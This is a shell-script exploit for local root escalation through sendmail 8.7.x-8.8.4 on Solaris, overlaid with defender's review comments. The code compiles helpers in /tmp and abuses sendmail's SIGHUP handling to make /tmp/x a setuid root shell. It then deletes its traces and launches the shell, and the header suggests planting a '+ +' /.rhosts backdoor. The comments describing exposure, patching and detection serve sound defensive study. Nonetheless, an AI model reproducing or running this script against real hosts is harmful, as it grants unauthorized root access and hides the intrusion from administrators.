
Solaris 2.x sendmail root exploit

#/bin/sh
#
# Spac3D0g's Sendmail 8.7.x-8.8.4 root 'sploit.
# (Rewritten from Leshka's to support Solaris)
#
# Tested on Solaris 2.5, 2.5.1, other OS's too..
# 
# Should create a suid program /tmp/x that calls shell as root.
#
# Modify RUN in x.c for what you wanna run, and possibly the location
# or format of the ps command in the KILL line below for your platform.
#
# Or you could remove x.c alltogether and just put what you wanna do as
# root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
#
#
# NOTE(review): defender's reading of the steps below.
#   1. Three C sources are written to /tmp and compiled there with gcc.
#   2. /tmp/spawnfish execs /usr/lib/sendmail with argv[0] set to
#      "/tmp/smtpd" instead of the real program name.
#   3. That sendmail process is sent SIGHUP. The script then expects
#      /tmp/smtpd to have run as root -- presumably the affected sendmail
#      re-executes argv[0] on HUP without dropping privileges; that logic is
#      not on this page, confirm against the vendor advisory.
#   4. /tmp/smtpd makes /tmp/x root-owned with mode 4755 (setuid).
# Exposure: local accounts on hosts running sendmail in the range named in
# the header (8.7.x-8.8.4). Fix: upgrade sendmail beyond that range or apply
# the vendor patch. Mounting /tmp nosuid only neutralises the setuid file in
# step 4, not the root-level execution in step 3.
# Detection: setuid root-owned files under /tmp, a sendmail process whose
# argv[0] is a path outside the system directories, and an unprivileged user
# compiling into /tmp shortly before signalling sendmail.
#
# Payload: a program that execs the shell named in RUN. It only becomes
# privileged once the chown/chmod in smtpd.c has been applied to /tmp/x.
cat << _EOF_ >/tmp/x.c
 #define RUN "/bin/ksh"
 #include<stdio.h>
 main()
 {
    execl(RUN,RUN,NULL);
 }
_EOF_
#
# Launcher: starts sendmail with a caller-chosen argv[0] ("/tmp/smtpd").
# Process listings will show that path rather than "sendmail", which is a
# useful audit signal.
cat << _EOF_ >/tmp/spawnfish.c
 main()
 {
   execl("/usr/lib/sendmail","/tmp/smtpd",0);      
 }                                             
_EOF_
#
# Helper meant to be run with root privileges: sets uid/gid to 0 and then
# marks /tmp/x as root-owned and setuid (4755).
cat << _EOF_ >/tmp/smtpd.c
 main()
 {
   setuid(0); setgid(0); 
   system("chown root /tmp/x ;chmod 4755 /tmp/x");
 }
_EOF_
#
#
# Build all three binaries in /tmp; needs a compiler on the target host.
gcc -O  -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
# Start sendmail under the substituted argv[0].
/tmp/spawnfish
# Find the PID by grepping BSD-style ps output for "/tmp/smtpd" and send it
# SIGHUP; this signal is the trigger the script relies on.
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
# Sources and helper binaries are deleted, so only /tmp/x is left on disk.
# Forensics should not expect the other files; rely on process accounting,
# audit records and timestamps on /tmp/x instead.
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
# Wait for the helper to finish before checking the result.
sleep 5
# -u is true only if /tmp/x exists with the setuid bit set, i.e. the helper
# ran and the chmod 4755 took effect; /tmp/x is then executed.
if [ -u /tmp/x ] ; then
   echo "leet..."
   /tmp/x
fi
